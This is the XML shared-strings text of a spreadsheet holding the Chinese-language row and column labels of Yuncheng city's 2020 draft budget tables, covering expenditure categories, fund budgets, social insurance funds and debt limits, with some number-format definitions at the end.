    <t xml:space="preserve">    广播电视</t>
  </si>
  <si>
    <t xml:space="preserve">      广播</t>
  </si>
  <si>
    <t xml:space="preserve">      电视</t>
  </si>
  <si>
    <t xml:space="preserve">      监测监管</t>
  </si>
  <si>
    <t xml:space="preserve">      其他广播电视支出</t>
  </si>
  <si>
    <t>监督热线升级改版。</t>
  </si>
  <si>
    <t xml:space="preserve">    其他文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">      宣传文化发展专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      文化产业发展专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t>八、社会保障和就业支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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九、卫生健康支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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老龄卫生健康事务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他卫生健康支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他卫生健康支出</t>
  </si>
  <si>
    <t>十、节能环保支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十一、城乡社区支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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建设市场管理与监督</t>
  </si>
  <si>
    <t xml:space="preserve">    其他城乡社区支出</t>
  </si>
  <si>
    <t>十二、农林水支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十三、交通运输支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十四、资源勘探工业信息等支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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补充财信投资有限公司资本金。</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十五、商业服务业等支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十六、金融支出</t>
  </si>
  <si>
    <t xml:space="preserve">    金融部门行政支出</t>
  </si>
  <si>
    <t xml:space="preserve">      安全防卫</t>
  </si>
  <si>
    <t xml:space="preserve">      金融部门其他行政支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他金融支出</t>
  </si>
  <si>
    <t>十七、援助其他地区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    一般公共服务1</t>
  </si>
  <si>
    <t xml:space="preserve">    教育1</t>
  </si>
  <si>
    <t xml:space="preserve">    文化体育与传媒1</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗卫生1</t>
  </si>
  <si>
    <t xml:space="preserve">    节能环保1</t>
  </si>
  <si>
    <t xml:space="preserve">    农业1</t>
  </si>
  <si>
    <t xml:space="preserve">    交通运输1</t>
  </si>
  <si>
    <t xml:space="preserve">    住房保障1</t>
  </si>
  <si>
    <t xml:space="preserve">    其他支出1</t>
  </si>
  <si>
    <t>十八、自然资源海洋气象等支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十九、住房保障支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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二十、粮油物资储备支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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二十一、灾害防治及应急管理支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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其他自然灾害救灾及恢复重建支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他灾害防治及应急管理支出</t>
  </si>
  <si>
    <t>二十二、预备费</t>
  </si>
  <si>
    <t>二十三、债务付息支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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二十四、债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务发行费用支出</t>
  </si>
  <si>
    <t>二十五、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">    年初预留</t>
  </si>
  <si>
    <t xml:space="preserve">    其他支出</t>
  </si>
  <si>
    <t>运城市市本级二○二○年一般公共预算支出分经济科目表（草案）</t>
  </si>
  <si>
    <t xml:space="preserve">  表九</t>
  </si>
  <si>
    <t>经济科目名称</t>
  </si>
  <si>
    <t>2020年当年财力安排预算数</t>
  </si>
  <si>
    <t>合         计</t>
  </si>
  <si>
    <t>一、机关工资福利支出</t>
  </si>
  <si>
    <t>二、机关商品和服务支出</t>
  </si>
  <si>
    <t>三、机关资本性支出（一）</t>
  </si>
  <si>
    <t>四、机关资本性支出（二）</t>
  </si>
  <si>
    <t>五、对事业单位经常性补助</t>
  </si>
  <si>
    <t>六、对事业单位资本性补助</t>
  </si>
  <si>
    <t>七、对企业补助</t>
  </si>
  <si>
    <t>八、对企业资本性支出</t>
  </si>
  <si>
    <t>九、对个人和家庭的补助</t>
  </si>
  <si>
    <t>十、对社会保障基金补助</t>
  </si>
  <si>
    <t>十一、债务利息及费用支出</t>
  </si>
  <si>
    <t>十二、债务还本支出</t>
  </si>
  <si>
    <t>十三、预备费及预留</t>
  </si>
  <si>
    <t>十四、其他支出</t>
  </si>
  <si>
    <t>运城市市本级二○二○年一般公共预算基本支出分经济科目表（草案）</t>
  </si>
  <si>
    <t xml:space="preserve">  表十</t>
  </si>
  <si>
    <t xml:space="preserve">  工资奖金津补贴</t>
  </si>
  <si>
    <t xml:space="preserve">  社会保障缴费</t>
  </si>
  <si>
    <t xml:space="preserve">  住房公积金</t>
  </si>
  <si>
    <t xml:space="preserve">  其他工资福利支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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三、对事业单位经常性补助</t>
  </si>
  <si>
    <t xml:space="preserve">  工资福利支出</t>
  </si>
  <si>
    <t xml:space="preserve">  商品和服务支出</t>
  </si>
  <si>
    <t>四、对个人和家庭的补助</t>
  </si>
  <si>
    <t xml:space="preserve">  社会福利和救助</t>
  </si>
  <si>
    <t xml:space="preserve">  助学金</t>
  </si>
  <si>
    <t xml:space="preserve">  离退休费</t>
  </si>
  <si>
    <t xml:space="preserve">  其他对个人和家庭的补助</t>
  </si>
  <si>
    <t>运城市市本级二○二○年政府性基金预算收入（草案）</t>
  </si>
  <si>
    <t>表十一</t>
  </si>
  <si>
    <t>一、农网还贷资金收入</t>
  </si>
  <si>
    <t>二、海南省高等级公路车辆通行附加费收入</t>
  </si>
  <si>
    <t>三、港口建设费收入</t>
  </si>
  <si>
    <t>四、国家电影事业发展专项资金收入</t>
  </si>
  <si>
    <t>五、国有土地收益基金收入</t>
  </si>
  <si>
    <t>2019年一次性入库因素影响。</t>
  </si>
  <si>
    <t>六、农业土地开发资金收入</t>
  </si>
  <si>
    <t>七、国有土地使用权出让收入</t>
  </si>
  <si>
    <t>八、大中型水库库区基金收入</t>
  </si>
  <si>
    <t>九、彩票公益金收入</t>
  </si>
  <si>
    <t>十、城市基础设施配套费收入</t>
  </si>
  <si>
    <t>十一、小型水库移民扶助基金收入</t>
  </si>
  <si>
    <t>十二、国家重大水利工程建设基金收入</t>
  </si>
  <si>
    <t>十三、车辆通行费</t>
  </si>
  <si>
    <t>十四、污水处理费收入</t>
  </si>
  <si>
    <t>十五、彩票发行机构和彩票销售机构的业务费用</t>
  </si>
  <si>
    <t>十六、其他政府性基金收入</t>
  </si>
  <si>
    <t>十七、专项债券对应项目专项收入</t>
  </si>
  <si>
    <t>运城市市本级二○二○年政府性基金预算支出（草案）</t>
  </si>
  <si>
    <t>表十二</t>
  </si>
  <si>
    <t>科  目  名  称</t>
  </si>
  <si>
    <t>其中：本级收入安排支出数</t>
  </si>
  <si>
    <t>为2019年
预算数%</t>
  </si>
  <si>
    <t>政府性基金预算当年安排支出合计</t>
  </si>
  <si>
    <t>一、文化旅游体育与传媒支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 </t>
  </si>
  <si>
    <t xml:space="preserve">   国家电影事业发展专项资金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      资助城市影院</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国家电影事业发展专项资金对应专项债务收入支出</t>
  </si>
  <si>
    <t>二、社会保障和就业支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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三、节能环保支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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五、农林水支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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三峡工程后续工作</t>
  </si>
  <si>
    <t xml:space="preserve">      其他重大水利工程建设基金对应专项债务收入支出</t>
  </si>
  <si>
    <t>六、交通运输支出</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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七、资源勘探工业信息等支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农网还贷资金支出</t>
  </si>
  <si>
    <t>八、其他支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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用于城乡医疗救助的的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于其他社会公益事业的彩票公益金支出</t>
  </si>
  <si>
    <t>九、债务付息支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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十、债务发行费用支出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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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运城市市本级二○二○年国有资本经营预算收支表（草案）</t>
  </si>
  <si>
    <t xml:space="preserve">  表十三</t>
  </si>
  <si>
    <t>收                        入</t>
  </si>
  <si>
    <t>支                        出</t>
  </si>
  <si>
    <t>项    目</t>
  </si>
  <si>
    <t>2019年
完成数</t>
  </si>
  <si>
    <t>2019年当年安排预算数</t>
  </si>
  <si>
    <t>2020年当年安排预算数</t>
  </si>
  <si>
    <t>为2019年当年预算数%</t>
  </si>
  <si>
    <t>一、利润收入</t>
  </si>
  <si>
    <t>一、解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t>二、股利、股息收入</t>
  </si>
  <si>
    <t>二、国有企业资本金注入</t>
  </si>
  <si>
    <t>三、产权转让收入</t>
  </si>
  <si>
    <t>三、国有企业政策性补贴</t>
  </si>
  <si>
    <t>四、清算收入</t>
  </si>
  <si>
    <t>四、金融国有资本经营预算支出</t>
  </si>
  <si>
    <t>五、其他国有资本经营预算收入</t>
  </si>
  <si>
    <t>五、其他国有资本经营预算支出</t>
  </si>
  <si>
    <t>社会保险基金预算</t>
  </si>
  <si>
    <t>运城市及市本级二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>表十四</t>
  </si>
  <si>
    <t>单位：万元</t>
  </si>
  <si>
    <t>2019年预算数</t>
  </si>
  <si>
    <t>2019年执行数</t>
  </si>
  <si>
    <t>执行为年度预算%</t>
  </si>
  <si>
    <t>备  注</t>
  </si>
  <si>
    <t>运城市</t>
  </si>
  <si>
    <t>全市社会保险基金预算收入</t>
  </si>
  <si>
    <t>主要是2019年全国范围内减税降费政策影响，单位缴费部分19%下调至16%。</t>
  </si>
  <si>
    <t>全市社会保险基金预算支出</t>
  </si>
  <si>
    <t>全市社会保险基金预算本年收支结余</t>
  </si>
  <si>
    <t>主要原因是：城乡居民基本医疗保险支出费用较大：一是基本医疗保险待遇水平提高；二是严格落实建档立卡贫困人口帮扶政策；三是19年清算2018年医疗保险费用。</t>
  </si>
  <si>
    <t>全市年末滚存结余</t>
  </si>
  <si>
    <t>市本级</t>
  </si>
  <si>
    <t>市本级社会保险基金预算收入</t>
  </si>
  <si>
    <t>市本级社会保险基金预算支出</t>
  </si>
  <si>
    <t>市本级社会保险基金预算本年收支结余</t>
  </si>
  <si>
    <t>市本级年末滚存结余</t>
  </si>
  <si>
    <t>运城市二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>表十五</t>
  </si>
  <si>
    <t>项        目</t>
  </si>
  <si>
    <t>合计</t>
  </si>
  <si>
    <t>企业职工基本养老保险基金</t>
  </si>
  <si>
    <t>城乡居民基本养老基金</t>
  </si>
  <si>
    <t>机关事业单位基本养老保险基金</t>
  </si>
  <si>
    <t>城镇职工基本医疗保险基金</t>
  </si>
  <si>
    <t>城乡居民基本医疗保险基金</t>
  </si>
  <si>
    <t>工伤保险
基  金</t>
  </si>
  <si>
    <t>失业保险
基  金</t>
  </si>
  <si>
    <t>上年结余</t>
  </si>
  <si>
    <t>一、收入</t>
  </si>
  <si>
    <t>其中： 1、保险费收入</t>
  </si>
  <si>
    <t xml:space="preserve">       2、利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">       3、财政补贴收入</t>
  </si>
  <si>
    <t xml:space="preserve">       4、其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">       5、转移收入</t>
  </si>
  <si>
    <t xml:space="preserve">       6、上级补助收入</t>
  </si>
  <si>
    <t>二、支出</t>
  </si>
  <si>
    <t>其中： 1、社会保险待遇支出</t>
  </si>
  <si>
    <t xml:space="preserve">       2、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">       3、转移支出</t>
  </si>
  <si>
    <t xml:space="preserve">       4、上解上级支出</t>
  </si>
  <si>
    <t>三、本年收支结余</t>
  </si>
  <si>
    <t>四、年末滚存结余</t>
  </si>
  <si>
    <t>运城市市本级二○一九年社会保险基金预算执行情况表</t>
  </si>
  <si>
    <t>表十六</t>
  </si>
  <si>
    <t xml:space="preserve">    其中： 1、保险费收入</t>
  </si>
  <si>
    <t xml:space="preserve">           2、利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">           3、财政补贴收入</t>
  </si>
  <si>
    <t xml:space="preserve">           4、其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">           5、转移收入</t>
  </si>
  <si>
    <t xml:space="preserve">    6、上级补助收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其中： 1、社会保险待遇支出</t>
  </si>
  <si>
    <t xml:space="preserve">           2、其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">           3、转移支出</t>
  </si>
  <si>
    <t xml:space="preserve">           4、上解上级支出</t>
  </si>
  <si>
    <t>运城市及市本级二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t>表十七</t>
  </si>
  <si>
    <t>运城市社会保险基金预算</t>
  </si>
  <si>
    <t>市本级社会保险基金预算</t>
  </si>
  <si>
    <t>运城市二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t xml:space="preserve">  表十八</t>
  </si>
  <si>
    <t>表十三</t>
  </si>
  <si>
    <t>城乡居民基本养老保险基金</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中: 1、保险费收入</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中：1、社会保险待遇支出</t>
  </si>
  <si>
    <t>运城市市本级二○二○年社会保险基金预算（草案）</t>
  </si>
  <si>
    <t>表十九</t>
  </si>
  <si>
    <t>城镇职工基本
医疗保险基金</t>
  </si>
  <si>
    <t>城乡居民基本
医疗保险基金</t>
  </si>
  <si>
    <t>政府债务限额和余额情况表</t>
  </si>
  <si>
    <t>运城市二○一八年和二○一九年政府一般债务限额和余额情况表</t>
  </si>
  <si>
    <t xml:space="preserve">  表二十</t>
  </si>
  <si>
    <t xml:space="preserve">单位：亿元 </t>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>金额</t>
  </si>
  <si>
    <t>2018年一般债务限额</t>
  </si>
  <si>
    <t xml:space="preserve"> 其中：市本级</t>
  </si>
  <si>
    <t>2018年一般债务余额</t>
  </si>
  <si>
    <t>2019年一般债务限额</t>
  </si>
  <si>
    <t>2019年一般债务余额</t>
  </si>
  <si>
    <t>运城市二○一八年和二○一九年政府专项债务限额和余额情况表</t>
  </si>
  <si>
    <t xml:space="preserve">  表二十一</t>
  </si>
  <si>
    <t>2018年专项债务限额</t>
  </si>
  <si>
    <t>2018年专项债务余额</t>
  </si>
  <si>
    <t>2019年专项债务限额</t>
  </si>
  <si>
    <t>2019年专项债务余额</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">市四届人大六次会议秘书处  　                       　                 </t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">  2020</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="仿宋_GB2312"/>
        <family val="3"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="仿宋_GB2312"/>
        <family val="3"/>
      </rPr>
      <t>月印</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>500</t>
    </r>
    <r>
      <rPr>
        <sz val="16"/>
        <rFont val="仿宋_GB2312"/>
        <family val="3"/>
      </rPr>
      <t>份</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</si>
</sst>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 ;\-#,##0.00;;"/>
    <numFmt numFmtId="179" formatCode="0;_ "/>
    <numFmt numFmtId="180" formatCode="0.0_ "/>
    <numFmt numFmtId="181" formatCode="#,##0.00_ "/>
    <numFmt numFmtId="182" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="183" formatCode="#,##0_ "/>
  </numFmts>
  <fonts count="65">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="16"/>
